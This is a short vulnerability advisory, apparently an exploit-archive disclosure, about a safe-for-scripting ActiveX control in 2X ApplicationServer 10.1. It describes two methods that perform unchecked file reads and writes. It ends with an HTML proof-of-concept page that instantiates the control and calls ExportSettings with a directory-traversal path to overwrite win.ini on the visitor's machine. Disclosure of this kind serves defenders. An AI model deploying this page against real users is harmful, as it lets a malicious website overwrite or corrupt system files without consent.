The mentioned product installs an ActiveX control with
the following settings:
ProgID: TuxScripting.TuxSystem.1
CLSID: {5BD64392-DA66-4852-9715-CFBA98D25296}
Binary Path C:\Program Files\2X\ApplicationServer\TuxScripting.dll
Implements IObjectSafety: Yes
Safe for Scripting: True
Safe for Initialization: ?
According to the IObjectSafety interface this control is Safe for Scripting
then Internet Explorer will allow access to the availiable methods and
properties.
Vulnerability:
Two methods perform unsecure file operations (read/write):
If a remote attacker is able to take control of the file content, could also be
capable to run arbitrary code. At the time of this report, this could not be achieved yet
(I have experienced some unuseful crashes by calling ImportSettings() ...)
As attachment, proof of concept code which overwrites win.ini
POC:
<!--
2X ApplicationServer 10.1 TuxSystem Class ActiveX Control TuxScripting.dll
Remote File Overwrite Vulnerability
ActiveX settings:
ProgID: TuxScripting.TuxSystem.1
CLSID: {5BD64392-DA66-4852-9715-CFBA98D25296}
Binary Path C:\Program Files\2X\ApplicationServer\TuxScripting.dll
Implements IObjectSafety: Yes
Safe for Scripting: True
Safe for Initialization: ?
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
var obj = new ActiveXObject("TuxScripting.TuxSystem.1");
obj.ExportSettings("../../../../../../../../windows/win.ini");
</script>